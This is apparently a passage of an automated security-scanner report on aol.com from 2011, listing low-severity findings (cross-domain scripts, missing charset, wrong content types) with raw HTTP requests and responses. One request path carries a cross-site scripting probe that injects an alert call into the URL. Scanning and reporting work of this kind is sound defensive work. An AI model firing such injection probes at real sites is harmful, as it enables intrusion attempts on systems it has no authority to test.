Set-Cookie: tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; Expires=Sat, 17-Aug-2013 22:13:44 GMT; Path=/
Content-Length: 81413

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="silkscreen_surfer">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/os/omniture/prod/omniunih_portal_min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

7.2. http://www.aol.com/video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254)

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video//%22ns=%22alert(0x000254)//%22ns=%22alert(0x000254) HTTP/1.1
Host: www.aol.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Thu, 18 Aug 2011 23:26:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-107-99.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=2E211D57875F8FCD299BAF70F0E8D34E; Path=/aol
Connection: close
Content-Length: 16617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...

7.3. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:15 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-38.asset.aol.com
Content-Type: text/html;;charset=utf-8
Set-Cookie: JSESSIONID=AB6892FB05BD4073E3A16F7705718005; Path=/aol
Content-Length: 40895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.fac
...[SNIP]...
<body class="butterfly">
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://portal.aolcdn.com/p5/_v58.6/js/main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/videoplayer/loader.js"></script>
<script type="text/javascript" src="http://player.play.it/player/launchAolPlayer.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

8. HTML does not specify charset
There are 2 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


8.1. http://www.aol.com/ads/load_v7.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /ads/load_v7.html

Request

GET /ads/load_v7.html HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:17 GMT
Server: Apache
Accept-Ranges: bytes
ntCoent-Length: 1474
Content-Type: text/html
Content-Length: 1474

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
if (dom!=1)document.domain=dom
else {
var adsIn=1;
var f=document.cr
...[SNIP]...

8.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ads/load_v7.html HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:14:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html
ntCoent-Length: 1474
Content-Length: 1474

<html>
<head>
<script type='text/javascript'>
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
if (dom!=1)document.domain=dom
else {
var adsIn=1;
var f=document.cr
...[SNIP]...

9. Content type incorrectly stated
There are 2 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


9.1. http://www.aol.com/ajax.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aol.com
Path:   /ajax.jsp

Issue detail

The response contains the following Content-type statement: text/javascript;charset=UTF-8. The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /ajax.jsp?m=dynamiclead&p=dynamicleadslide&vbclass=vid_over&dlNo=3&ajax=1&sitHot=&offset=0&slot=dynamiclead&vcslot=dynamiclead-video-config HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; dlact=dl2

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:13:38 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-149-174-173-50.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
ntCoent-Length: 2520
Set-Cookie: JSESSIONID=A3952DF32658E1DB2F8B42FB462C9CBB; Path=/aol
Content-Length: 2520

<span class="dn" id="#curr-dlcount">25</span>
<span id="slduration" title="10000"></span>
<div class="mnid-dl3 plid-87592 display-lightbox">
<span class="dn" id="dl-vid"></
...[SNIP]...

9.2. http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aol.com
Path:   /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp

Issue detail

The response contains the following Content-type statement: text/javascript;charset=UTF-8. The response states that it contains script. However, it actually appears to contain HTML.

Request

GET /video/urlesque-mans-about-to-do-the-impossible/1116699228001/ajax.jsp?m=dailyvj&p=videoconfig HTTP/1.1
Host: www.aol.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/video/urlesque-mans-about-to-do-the-impossible/1116699228001/
Aolcom-Ajax: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2722E86A051D367A-6000013620041512[CE]; tst=%2C1%2Cs391a%3A%2C1%2Cs392a%3A%2C1%2Cs393a%3A%2C1%2Cs394a%3A%2C1%2Cs395a%3A%2C1%2Cs396a%3A%2C1%2Cs397a; s_pers=%20s_getnr%3D1313705608337-New%7C1376777608337%3B%20s_nrgvo%3DNew%7C1376777608338%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rrpmo1=rr1~1~1313705590192~0; stips5=1; dlact=dl5; UNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f; CUNAUTHID=1.1e73089cc54a11e0be833dd12c581347.7e0f

Response

HTTP/1.1 200 OK
Date: Thu, 18 Aug 2011 22:16:23 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: vm-207-200-106-72.asset.aol.com
Content-Type: text/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=26F2058D44B9A19F05B6636E05EE5CF7; Path=/aol
Content-Length: 13787

<div id="videoShowUrls" class="dn">
You've Got:pair:http://video.aol.com/show/youve-got:show:AOL Daybreak:pair:http://video.aol.com/show/aol-daybreak:show:The Urlesque Show:pair:http://video.aol.c
...[SNIP]...
